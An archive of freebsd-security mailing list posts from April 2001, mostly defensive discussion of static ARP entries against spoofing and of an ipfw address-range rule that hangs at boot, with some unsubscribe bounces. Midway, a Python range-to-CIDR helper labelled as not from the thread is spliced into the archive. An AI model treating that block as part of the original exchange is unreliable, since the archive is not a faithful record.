>> address of the card. (At least I think so...never tried it) So an evil
>> machine could steal the MAC address and fool the switch into sending it your
>> traffic.
>>
>> Depending on how advanced your switch is and if it is manageable, you can
>> hardcode what MAC address is on what port...avoid this one as well.
>>
>> ----- Original Message -----
>> From: "Pär Thoren"
>> To:
>> Sent: Friday, April 20, 2001 13:13
>> Subject: static arp values
>>
>>
>> > Hi!
>> >
>> >
>> > Is it possible to make an arptable entry static? For example the arp address
>> > of my gateway. So that a man-in-the-middle attack can be prevented.
>> >
>> >
>> > I've tried "arp -S ip-adres mac-adres" but it seems that it is still
>> > possible to infect the arptable with a false mac address of the gateway and
>> > sniff the connection.
>> >
>> >
>> > /Pär
>> >
>> >
>> >
>> > To Unsubscribe: send mail to majordomo@FreeBSD.org
>> > with "unsubscribe freebsd-security" in the body of the message
>> >
>>
>>
>> To Unsubscribe: send mail to majordomo@FreeBSD.org
>> with "unsubscribe freebsd-security" in the body of the message
>>

PT> To Unsubscribe: send mail to majordomo@FreeBSD.org
PT> with "unsubscribe freebsd-security" in the body of the message

--
Igor
mailto:poige@morning.ru

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sat Apr 21 6:15:44 2001
Delivered-To: freebsd-security@freebsd.org
Received: from ldc.ro (ldc-gw.pub.ro [192.129.3.227]) by hub.freebsd.org (Postfix) with SMTP id AFCF837B422 for ; Sat, 21 Apr 2001 06:15:37 -0700 (PDT) (envelope-from razor@ldc.ro)
Received: (qmail 56377 invoked by uid 666); 21 Apr 2001 13:15:31 -0000
Date: Sat, 21 Apr 2001 16:05:33 +0300
From: Alex Popa
To: Chris Faulhaber
Subject: Re: more on promiscuity
Message-ID: <20010421160533.A56321@ldc.ro>
References: <20010419095536.B81766@peitho.fxp.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010419095536.B81766@peitho.fxp.org>; from jedgar@fxp.org on Thu, Apr 19, 2001 at 09:55:37AM -0400
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, Apr 19, 2001 at 09:55:37AM -0400, Chris Faulhaber wrote:
> On Thu, Apr 19, 2001 at 08:52:50AM -0500, George.Giles@mcmail.vanderbilt.edu wrote:
> > Ntop, I assume, will enable ?
> > How do I disable once it is enabled ?
> >
>
> It will be disabled when the program terminates (you should have
> both enabled and disabled entries in your logs)

When using user ppp, and tcpdump on my tun0 interface, the interface gets
into promiscuous mode, but not out of promisc mode. (I am a bit unsure, but
I think it stays promisc even after quitting ppp, not that it would be a
problem I think)

>
> --
> Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org
> --------------------------------------------------------
> FreeBSD: The Power To Serve - http://www.FreeBSD.org

------------+------------------------------------------
Alex Popa,  | "Artificial Intelligence is
razor@ldc.ro|  no match for Natural Stupidity"
------------+------------------------------------------
"It took the computing power of three C-64s to fly to the Moon.
It takes a 486 to run Windows 95. Something is wrong here."
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sat Apr 21 8:51:53 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mailgate.kechara.net (mailgate.kechara.net [62.49.139.2]) by hub.freebsd.org (Postfix) with ESMTP id 6F97137B422 for ; Sat, 21 Apr 2001 08:51:50 -0700 (PDT) (envelope-from lee@kechara.net)
Received: from area57 (lan-fw.kechara.net [62.49.139.3]) by mailgate.kechara.net (8.9.3/8.9.3) with SMTP id SAA31941 for ; Sat, 21 Apr 2001 18:06:36 +0100
Message-Id: <200104211706.SAA31941@mailgate.kechara.net>
Date: Sat, 21 Apr 2001 16:54:35 +0100
To: freebsd-security@freebsd.org
From: Lee Smallbone
Subject: ipfw problem
Reply-To: lee@kechara.net
Organization: Kechara Internet
X-Mailer: Opera 5.02 build 856a
X-Priority: 3 (Normal)
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii";
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hi there,

The machine stops booting on either of these two rules, and I have to boot into
single user, remove the rules and reboot. What's wrong with them?

${fwcmd} add 300 unreach 9 all from 213.46.1.1-213.46.123.254 to ${ip}

I also get the same problem on this rule (in place of the one above):

${fwcmd} add 300 deny all from 213.46.1.1-213.46.123.254 to ${ip}

Any ideas? TIA.

--
Lee Smallbone
Kechara Internet

lee@kechara.net
www.kechara.net

Tel: (01243) 869 969
Fax: (01243) 866 685

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sat Apr 21 8:55:51 2001
Delivered-To: freebsd-security@freebsd.org
Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id 0EAB237B422 for ; Sat, 21 Apr 2001 08:55:48 -0700 (PDT) (envelope-from roam@orbitel.bg)
Received: (qmail 17570 invoked by uid 1000); 21 Apr 2001 15:54:10 -0000
Date: Sat, 21 Apr 2001 18:54:10 +0300
From: Peter Pentchev
To: Lee Smallbone
Cc: freebsd-security@freebsd.org
Subject: Re: ipfw problem
Message-ID: <20010421185410.C458@ringworld.oblivion.bg>
Mail-Followup-To: Lee Smallbone , freebsd-security@freebsd.org
References: <200104211706.SAA31941@mailgate.kechara.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <200104211706.SAA31941@mailgate.kechara.net>; from lee@kechara.net on Sat, Apr 21, 2001 at 04:54:35PM +0100
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Sat, Apr 21, 2001 at 04:54:35PM +0100, Lee Smallbone wrote:
> Hi there,
>
> The machine stops booting on either of these two rules, and I have to boot into
> single user, remove the rules and reboot. What's wrong with them?
>
> ${fwcmd} add 300 unreach 9 all from 213.46.1.1-213.46.123.254 to ${ip}
>
> I also get the same problem on this rule (in place of the one above):
>
> ${fwcmd} add 300 deny all from 213.46.1.1-213.46.123.254 to ${ip}

Where exactly in the boot process does it 'stop'? What application/program
is it trying to execute? Or does ipfw itself hang when adding those rules?

G'luck,
Peter

--
If this sentence were in Chinese, it would say something else.

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sat Apr 21 9: 0:21 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mailgate.kechara.net (mailgate.kechara.net [62.49.139.2]) by hub.freebsd.org (Postfix) with ESMTP id 5183D37B423 for ; Sat, 21 Apr 2001 09:00:18 -0700 (PDT) (envelope-from lee@kechara.net)
Received: from area57 (lan-fw.kechara.net [62.49.139.3]) by mailgate.kechara.net (8.9.3/8.9.3) with SMTP id SAA31977; Sat, 21 Apr 2001 18:15:00 +0100
Message-Id: <200104211715.SAA31977@mailgate.kechara.net>
Date: Sat, 21 Apr 2001 17:02:59 +0100
To: Peter Pentchev
Cc: freebsd-security@freebsd.org
From: Lee Smallbone
Subject: Re: ipfw problem
Reply-To: lee@kechara.net
Organization: Kechara Internet
X-Mailer: Opera 5.02 build 856a
X-Priority: 3 (Normal)
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii";
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hello Peter,

21/04/2001 22:54:10, Peter Pentchev wrote:

>On Sat, Apr 21, 2001 at 04:54:35PM +0100, Lee Smallbone wrote:
>> Hi there,
>>
>> The machine stops booting on either of these two rules, and I have to boot into
>> single user, remove the rules and reboot. What's wrong with them?
>>
>> ${fwcmd} add 300 unreach 9 all from 213.46.1.1-213.46.123.254 to ${ip}
>>
>> I also get the same problem on this rule (in place of the one above):
>>
>> ${fwcmd} add 300 deny all from 213.46.1.1-213.46.123.254 to ${ip}
>
>Where exactly in the boot process does it 'stop'? What application/program
>is it trying to execute? Or does ipfw itself hang when adding those rules?

ipfw hangs during boot in trying to add rule 300.

>
>G'luck,
>Peter
>
>--
>If this sentence were in Chinese, it would say something else.
>

--
Lee Smallbone
Kechara Internet

lee@kechara.net
www.kechara.net

Tel: (01243) 869 969
Fax: (01243) 866 685

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sat Apr 21 9: 8:51 2001
Delivered-To: freebsd-security@freebsd.org
Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id 830C637B422 for ; Sat, 21 Apr 2001 09:08:47 -0700 (PDT) (envelope-from roam@orbitel.bg)
Received: (qmail 30581 invoked by uid 1000); 21 Apr 2001 16:07:10 -0000
Date: Sat, 21 Apr 2001 19:07:10 +0300
From: Peter Pentchev
To: Lee Smallbone
Cc: freebsd-security@freebsd.org
Subject: Re: ipfw problem
Message-ID: <20010421190709.D458@ringworld.oblivion.bg>
Mail-Followup-To: Lee Smallbone , freebsd-security@freebsd.org
References: <200104211715.SAA31977@mailgate.kechara.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <200104211715.SAA31977@mailgate.kechara.net>; from lee@kechara.net on Sat, Apr 21, 2001 at 05:02:59PM +0100
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Sat, Apr 21, 2001 at 05:02:59PM +0100, Lee Smallbone wrote:
> Hello Peter,
>
> 21/04/2001 22:54:10, Peter Pentchev wrote:
>
> >On Sat, Apr 21, 2001 at 04:54:35PM +0100, Lee Smallbone wrote:
> >> Hi there,
> >>
> >> The machine stops booting on either of these two rules, and I have to boot into
> >> single user, remove the rules and reboot. What's wrong with them?
> >>
> >> ${fwcmd} add 300 unreach 9 all from 213.46.1.1-213.46.123.254 to ${ip}
> >>
> >> I also get the same problem on this rule (in place of the one above):
> >>
> >> ${fwcmd} add 300 deny all from 213.46.1.1-213.46.123.254 to ${ip}
> >
> >Where exactly in the boot process does it 'stop'? What application/program
> >is it trying to execute? Or does ipfw itself hang when adding those rules?
>
> ipfw hangs during boot in trying to add rule 300.

Well, I think there's something wrong with the rule itself. Nowhere in
the ipfw manpage could I find a syntax for specifying addresses in
an address-address format - it's either a single address, or address/bits,
or address:mask. Though the fact that ipfw hangs is a little disturbing,
I would advise that you rewrite this rule to use proper syntax, though
that might be a little tricky - the address range you've specified does
not fall under an easy mask :(

Do you want to allow 213.46.0.*? If not, then try..

${fwcmd} add 300 unreach 9 all from 213.46.0.0/18 to ${ip}
${fwcmd} add 301 unreach 9 all from 213.46.64.0/19 to ${ip}
${fwcmd} add 302 unreach 9 all from 213.46.96.0/20 to ${ip}
${fwcmd} add 303 unreach 9 all from 213.46.112.0/21 to ${ip}
${fwcmd} add 303 unreach 9 all from 213.46.120.0/22 to ${ip}

(ick!)

This would deny everything from 213.46.0.0 to 213.46.123.255. Yes, I know
it's ugly.

G'luck,
Peter

--
Do you think anybody has ever had *precisely this thought* before?
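Peter's hand-built block list above, and his later remark that the kernel tests a netmask with one bitwise AND, worked through as an added example (not code from the thread; the function names are my own). It turns an inclusive range into the CIDR blocks ipfw can match, renders them as numbered rules, and checks coverage with the same AND-and-compare test the kernel applies; the greedy algorithm is general, so it also gives the exact cover of Lee's 213.46.1.1-213.46.123.254 range, which Peter's five blocks over-approximate.

```python
"""Added example: range -> CIDR blocks for ipfw, checked the way the kernel
matches them. Not code from the thread; all names here are my own."""
import ipaddress
from typing import List, Tuple


def range_to_cidrs(first: str, last: str) -> List[str]:
    """Greedy decomposition of the inclusive range first..last into CIDR
    blocks: emit the largest block that starts at the current address, is
    aligned to its own size and does not run past `last`, then move on."""
    cur = int(ipaddress.IPv4Address(first))
    end = int(ipaddress.IPv4Address(last))
    if cur > end:
        raise ValueError("range start is after range end")
    blocks: List[str] = []
    while cur <= end:
        prefix = 32                      # a /32 always fits
        while prefix > 0:
            bigger = 1 << (33 - prefix)  # size of the next larger block
            if cur % bigger or cur + bigger - 1 > end:
                break
            prefix -= 1
        blocks.append(f"{ipaddress.IPv4Address(cur)}/{prefix}")
        cur += 1 << (32 - prefix)
    return blocks


def stdlib_cidrs(first: str, last: str) -> List[str]:
    """Same decomposition via the standard library, used as a cross-check."""
    nets = ipaddress.summarize_address_range(ipaddress.IPv4Address(first),
                                             ipaddress.IPv4Address(last))
    return [str(net) for net in nets]


def parse_cidr(cidr: str) -> Tuple[int, int]:
    """Return (network, mask) as integers for an 'a.b.c.d/n' block."""
    net, prefix = cidr.split("/")
    mask = (0xFFFFFFFF << (32 - int(prefix))) & 0xFFFFFFFF
    return int(ipaddress.IPv4Address(net)), mask


def matches(addr: int, net: int, mask: int) -> bool:
    """The per-rule test the kernel performs: one AND and one compare."""
    return (addr & mask) == net


def covers_exactly(first: str, last: str, cidrs: List[str]) -> bool:
    """True if every address in first..last matches exactly one block and
    the addresses just outside the range match none (no over-blocking)."""
    lo = int(ipaddress.IPv4Address(first))
    hi = int(ipaddress.IPv4Address(last))
    parsed = [parse_cidr(c) for c in cidrs]
    inside_ok = all(sum(matches(a, n, m) for n, m in parsed) == 1
                    for a in range(lo, hi + 1))
    outside_ok = not any(matches(a, n, m)
                         for a in (lo - 1, hi + 1) for n, m in parsed)
    return inside_ok and outside_ok


def ipfw_rules(cidrs: List[str], first_rule: int = 300,
               action: str = "unreach 9", fwcmd: str = "${fwcmd}",
               dst: str = "${ip}") -> List[str]:
    """Render one rule per block, numbered consecutively from first_rule
    so that no two rules share a number."""
    return [f"{fwcmd} add {first_rule + i} {action} all from {c} to {dst}"
            for i, c in enumerate(cidrs)]


# The five blocks suggested in the thread.
PETER_BLOCKS = ["213.46.0.0/18", "213.46.64.0/19", "213.46.96.0/20",
                "213.46.112.0/21", "213.46.120.0/22"]

if __name__ == "__main__":
    # Peter's blocks are the greedy cover of 213.46.0.0 - 213.46.123.255.
    print(range_to_cidrs("213.46.0.0", "213.46.123.255") == PETER_BLOCKS)
    # The range Lee actually asked for needs many more blocks.
    exact = range_to_cidrs("213.46.1.1", "213.46.123.254")
    print(len(exact), "blocks for the exact range")
    for rule in ipfw_rules(exact):
        print(rule)
    # Peter's version over-blocks: 213.46.0.0 - 213.46.1.0 is matched too.
    print(covers_exactly("213.46.1.1", "213.46.123.254", PETER_BLOCKS))
```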
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 21 9:22:45 2001 Delivered-To: freebsd-security@freebsd.org Received: from mailgate.kechara.net (mailgate.kechara.net [62.49.139.2]) by hub.freebsd.org (Postfix) with ESMTP id C3D4937B422 for ; Sat, 21 Apr 2001 09:22:32 -0700 (PDT) (envelope-from lee@kechara.net) Received: from area57 (lan-fw.kechara.net [62.49.139.3]) by mailgate.kechara.net (8.9.3/8.9.3) with SMTP id SAA32038; Sat, 21 Apr 2001 18:37:15 +0100 Message-Id: <200104211737.SAA32038@mailgate.kechara.net> Date: Sat, 21 Apr 2001 18:25:13 +0100 To: Peter Pentchev Cc: freebsd-security@freebsd.org From: Lee Smallbone Subject: Re: ipfw problem Reply-To: lee@kechara.net Organization: Kechara Internet X-Mailer: Opera 5.02 build 856a X-Priority: 3 (Normal) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi Peter, Thanks for your workaround, although it's not quite what I'd hoped for. (why does ipfw not allow ranges?? If the author listening...) I thought I had it for one minute, where I found that ${ip} isn't defined until later on in the script. No such luck. Ah well, thanks Peter! --Lee 1/04/2001 23:07:10, Peter Pentchev wrote: >On Sat, Apr 21, 2001 at 05:02:59PM +0100, Lee Smallbone wrote: >> Hello Peter, >> >> 21/04/2001 22:54:10, Peter Pentchev wrote: >> >> >On Sat, Apr 21, 2001 at 04:54:35PM +0100, Lee Smallbone wrote: >> >> Hi there, >> >> >> >> The machine stops booting on either of these two rules, and I have to boot into >> >> single user, remove the rules and reboot. What's wrong with them? 
>> >> >> >> ${fwcmd} add 300 unreach 9 all from 213.46.1.1-213.46.123.254 to ${ip} >> >> >> >> I also get the same problem on this rule (in place of the one above): >> >> >> >> ${fwcmd} add 300 deny all from 213.46.1.1-213.46.123.254 to ${ip} >> > >> >Where exactly in the boot process does it 'stop'? What application/program >> >is it trying to execute? Or does ipfw itself hang when adding those rules? >> >> ipfw hangs during boot in trying to add rule 300. > >Well, I think there's something wrong with the rule itself. Nowhere in >the ipfw manpage could I find a syntax for specifying addresses in >an address-address format - it's either a single address, or address/bits, >or address:mask. Though the fact that ipfw hangs is a little disturbing, >I would advise that you rewrite this rule to use proper syntax, though >that might be a little tricky - the address range you've specified does >not fall under an easy mask :( > >Do you want to allow 213.46.0.*? If not, then try.. > >${fwcmd} add 300 unreach 9 all from 213.46.0.0/18 to ${ip} >${fwcmd} add 301 unreach 9 all from 213.46.64.0/19 to ${ip} >${fwcmd} add 302 unreach 9 all from 213.46.96.0/20 to ${ip} >${fwcmd} add 303 unreach 9 all from 213.46.112.0/21 to ${ip} >${fwcmd} add 303 unreach 9 all from 213.46.120.0/22 to ${ip} > >(ick!) > >This would deny everything from 213.46.0.0 to 213.46.123.255. Yes, I know >it's ugly. > >G'luck, >Peter > >-- >Do you think anybody has ever had *precisely this thought* before? 
> >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > -- Lee Smallbone Kechara Internet To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 21 9:25:55 2001 Delivered-To: freebsd-security@freebsd.org Received: from nova.sparklist.com (nova.sparklist.com [207.250.144.28]) by hub.freebsd.org (Postfix) with SMTP id 59ED137B422 for ; Sat, 21 Apr 2001 09:25:49 -0700 (PDT) (envelope-from sparklist-admin@nova.sparklist.com) Message-Id: X-sparklist-type: unsubscribed From: "SparkLIST.com" Reply-To: "SparkLIST.com" To: freebsd-security@freebsd.org Subject: Re: your unsubscribe request Date: Sat, 21 Apr 2001 11:27:49 -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org As you requested, you have been unsubscribed from 'fwd-newswire'. --- Return-Path: Received: from mailhost.sparknet.net ([207.67.22.123]) by nova.sparklist.com with SMTP (SparkLIST.com WIN32 version 4.1); Sat, 21 Apr 2001 11:27:49 -0500 Received: from don-oakes.sparklist.com (dhcp-client-26.sparklist.com [207.250.191.151]) by mailhost.sparknet.net (8.10.1/8.10.1) with ESMTP id f3LGU0I04892 for ; Sat, 21 Apr 2001 11:30:00 -0500 Message-Id: <4.3.1.2.20010421112208.0262eba0@207.67.22.123> X-Sender: (Unverified) X-Mailer: QUALCOMM Windows Eudora Version 4.3.1 Date: Sat, 21 Apr 2001 11:22:11 -0500 To: fwd-newswire-request From: admin Subject: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed # Mail sent to leave-fwd-newswire-2059532e was converted to these commands: unsubscribe fwd-newswire freebsd-security@freebsd.org confirm end # This is the text of the message that triggered the action: Return-Path: Received: from mailhost.sparknet.net ([207.67.22.123]) by nova.sparklist.com with SMTP (SparkLIST.com WIN32 version 4.1); Sat, 21 Apr 2001 11:27:49 -0500 Received: from don-oakes.sparklist.com 
(dhcp-client-26.sparklist.com [207.250.191.151]) by mailhost.sparknet.net (8.10.1/8.10.1) with ESMTP id f3LGU0I04892 for ; Sat, 21 Apr 2001 11:30:00 -0500 Message-Id: <4.3.1.2.20010421112208.0262eba0@207.67.22.123> X-Sender: (Unverified) X-Mailer: QUALCOMM Windows Eudora Version 4.3.1 Date: Sat, 21 Apr 2001 11:22:11 -0500 To: leave-fwd-newswire-2059532E@nova.sparklist.com From: admin Subject: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 21 9:31:14 2001 Delivered-To: freebsd-security@freebsd.org Received: from nova.sparklist.com (nova.sparklist.com [207.250.144.28]) by hub.freebsd.org (Postfix) with SMTP id 7DC1C37B422 for ; Sat, 21 Apr 2001 09:31:11 -0700 (PDT) (envelope-from sparklist-admin@nova.sparklist.com) Message-Id: X-sparklist-type: unsubscribed From: "SparkLIST.com" Reply-To: "SparkLIST.com" To: freebsd-security@freebsd.org Subject: Re: your unsubscribe request Date: Sat, 21 Apr 2001 11:33:12 -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org As you requested, you have been unsubscribed from 'fwd-newswire'. 
--- Return-Path: Received: from nidnud.co.il ([213.57.64.98]) by nova.sparklist.com with SMTP (SparkLIST.com WIN32 version 4.1); Sat, 21 Apr 2001 11:33:11 -0500 Received: from rotem (windows.loc [192.168.1.2]) by nidnud.co.il (Postfix) with SMTP id 6E98E1F2CB for ; Sat, 21 Apr 2001 19:33:39 +0300 (IDT) Message-ID: <001d01c0ca88$a9ce3380$0201a8c0@rotem> From: "Rotem" To: fwd-newswire-request Subject: Date: Sat, 21 Apr 2001 19:29:47 +0200 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_001A_01C0CA99.6D463AA0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 # Mail sent to leave-fwd-newswire-2059532e was converted to these commands: unsubscribe fwd-newswire freebsd-security@freebsd.org confirm end # This is the text of the message that triggered the action: Return-Path: Received: from nidnud.co.il ([213.57.64.98]) by nova.sparklist.com with SMTP (SparkLIST.com WIN32 version 4.1); Sat, 21 Apr 2001 11:33:11 -0500 Received: from rotem (windows.loc [192.168.1.2]) by nidnud.co.il (Postfix) with SMTP id 6E98E1F2CB for ; Sat, 21 Apr 2001 19:33:39 +0300 (IDT) Message-ID: <001d01c0ca88$a9ce3380$0201a8c0@rotem> From: "Rotem" To: Subject: Date: Sat, 21 Apr 2001 19:29:47 +0200 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_001A_01C0CA99.6D463AA0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 This is a multi-part message in MIME format. ------=_NextPart_000_001A_01C0CA99.6D463AA0 Content-Type: text/plain; charset="windows-1255" Content-Transfer-Encoding: quoted-printable ------=_NextPart_000_001A_01C0CA99.6D463AA0 Content-Type: text/html; charset="windows-1255" Content-Transfer-Encoding: quoted-printable
 
------=_NextPart_000_001A_01C0CA99.6D463AA0--

From owner-freebsd-security Sat Apr 21 9:31:42 2001
Delivered-To: freebsd-security@freebsd.org
Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id 3394F37B424 for ; Sat, 21 Apr 2001 09:31:39 -0700 (PDT) (envelope-from roam@orbitel.bg)
Received: (qmail 39969 invoked by uid 1000); 21 Apr 2001 16:30:01 -0000
Date: Sat, 21 Apr 2001 19:30:01 +0300
From: Peter Pentchev
To: Lee Smallbone
Cc: freebsd-security@freebsd.org
Subject: Re: ipfw problem
Message-ID: <20010421193001.E458@ringworld.oblivion.bg>
Mail-Followup-To: Lee Smallbone , freebsd-security@freebsd.org
References: <200104211737.SAA32038@mailgate.kechara.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <200104211737.SAA32038@mailgate.kechara.net>; from lee@kechara.net on Sat, Apr 21, 2001 at 06:25:13PM +0100
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Sat, Apr 21, 2001 at 06:25:13PM +0100, Lee Smallbone wrote:
> Hi Peter,
>
> Thanks for your workaround, although it's not quite what I'd hoped for. (why does ipfw not allow
> ranges?? If the author is listening...)
>
> I thought I had it for one minute, where I found that ${ip} isn't defined until later on
> in the script. No such luck.

Hmm, I didn't quite parse that - are you saying that ${ip} really isn't defined
until later? If so, has that solved your problem?

And about the ranges - ipfw(8) is only a controlling interface to the kernel
ipfw routines. It would be *much* harder for the kernel to compare every
packet's address against a range than it is to compare it against a netmask -
the latter only involves a bitwise AND operator. I wonder if ranges would
be so hard to implement though; the fact is, they are not implemented at
the moment, this would take some work, and actually, I'm not aware of any
other firewalling system that implements ranges. I would be VERY much out
of my bailiwick here, though, because I've not dealt with that many other
firewalling systems, but still, I think ranges are somewhat unusual in
firewall rules :)

G'luck,
Peter

--
I had to translate this sentence into English because I could not read the original Sanskrit.

From owner-freebsd-security Sat Apr 21 9:38:22 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mailgate.kechara.net (mailgate.kechara.net [62.49.139.2]) by hub.freebsd.org (Postfix) with ESMTP id 7897637B423 for ; Sat, 21 Apr 2001 09:38:17 -0700 (PDT) (envelope-from lee@kechara.net)
Received: from area57 (lan-fw.kechara.net [62.49.139.3]) by mailgate.kechara.net (8.9.3/8.9.3) with SMTP id SAA32096; Sat, 21 Apr 2001 18:53:03 +0100
Message-Id: <200104211753.SAA32096@mailgate.kechara.net>
Date: Sat, 21 Apr 2001 18:41:00 +0100
To: Peter Pentchev
Cc: freebsd-security@freebsd.org
From: Lee Smallbone
Subject: Re: ipfw problem
Reply-To: lee@kechara.net
Organization: Kechara Internet
X-Mailer: Opera 5.02 build 856a
X-Priority: 3 (Normal)
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii";
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I know that some of the 'hardware' firewall boxes (such as SonicWALL) support IP ranges, but I've yet to find a software solution.

21/04/2001 23:30:01, Peter Pentchev wrote:

>On Sat, Apr 21, 2001 at 06:25:13PM +0100, Lee Smallbone wrote:
>> Hi Peter,
>>
>> Thanks for your workaround, although it's not quite what I'd hoped for. (why does ipfw not allow
>> ranges?? If the author is listening...)
>>
>> I thought I had it for one minute, where I found that ${ip} isn't defined until later on
>> in the script. No such luck.
>
>Hmm, I didn't quite parse that - are you saying that ${ip} really isn't defined
>until later? If so, has that solved your problem?

No, it didn't solve the problem. :) I was saying I thought it *might* have, but it was only another error, which occurred after the range was specified, thus ipfw didn't ever get to that error.

>And about the ranges - ipfw(8) is only a controlling interface to the kernel
>ipfw routines. It would be *much* harder for the kernel to compare every
>packet's address against a range than it is to compare it against a netmask -
>the latter only involves a bitwise AND operator. I wonder if ranges would
>be so hard to implement though; the fact is, they are not implemented at
>the moment, this would take some work, and actually, I'm not aware of any
>other firewalling system that implements ranges. I would be VERY much out
>of my bailiwick here, though, because I've not dealt with that many other
>firewalling systems, but still, I think ranges are somewhat unusual in
>firewall rules :)
>
>G'luck,
>Peter
>
>--
>I had to translate this sentence into English because I could not read the original Sanskrit.
>

--
Lee Smallbone
Kechara Internet
lee@kechara.net
www.kechara.net
Tel: (01243) 869 969
Fax: (01243) 866 685

From owner-freebsd-security Sat Apr 21 12:16:17 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.gmx.net (pop.gmx.net [194.221.183.20]) by hub.freebsd.org (Postfix) with SMTP id 4DBCA37B422 for ; Sat, 21 Apr 2001 12:16:13 -0700 (PDT) (envelope-from Gerhard.Sittig@gmx.net)
Received: (qmail 27793 invoked by uid 0); 21 Apr 2001 19:16:11 -0000
Received: from pd9508867.dip.t-dialin.net (HELO speedy.gsinet) (217.80.136.103) by mail.gmx.net (mp005-rz3) with SMTP; 21 Apr 2001 19:16:11 -0000
Received: (from sittig@localhost) by speedy.gsinet (8.8.8/8.8.8) id UAA18331 for freebsd-security@freebsd.org; Sat, 21 Apr 2001 20:02:09 +0200
Date: Sat, 21 Apr 2001 20:02:08 +0200
From: Gerhard Sittig
To: freebsd-security@freebsd.org
Subject: Re: static arp values
Message-ID: <20010421200208.X20830@speedy.gsinet>
Mail-Followup-To: freebsd-security@freebsd.org
References:
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable
X-Mailer: Mutt 1.0i
In-Reply-To: ; from t98pth@student.bth.se on Fri, Apr 20, 2001 at 07:13:14PM +0200
Organization: System Defenestrators Inc.
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, Apr 20, 2001 at 19:13 +0200, Pär Thoren wrote:
>
> Is it possible to make an arptable entry static? For example the
> arp address of my gateway. So that man-in-the-middle attack can
> be prevented.

See PR conf/23063 with the "[PATCH] for static ARP tables in rc.network" synopsis. It allows you to do everything statically or just "seed" your table on bootup and still have the kernel learn new entries.
There's been a short thread in the -security list around the time of the PR's submission discussing that this is not a very clean and reliable method of preventing attacks but mostly gives "warm fuzzies" for those of us who like static configuration. :)

virtually yours
82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76

Gerhard Sittig
true | mail -s "get gpg key" Gerhard.Sittig@gmx.net
--
If you don't understand or are scared by any of the above ask your parents or an adult to help you.

From owner-freebsd-security Sat Apr 21 22: 1:16 2001
Delivered-To: freebsd-security@freebsd.org
Received: from ns.morning.ru (ns.morning.ru [195.161.98.5]) by hub.freebsd.org (Postfix) with ESMTP id C91DC37B648 for ; Sat, 21 Apr 2001 22:01:08 -0700 (PDT) (envelope-from poige@morning.ru)
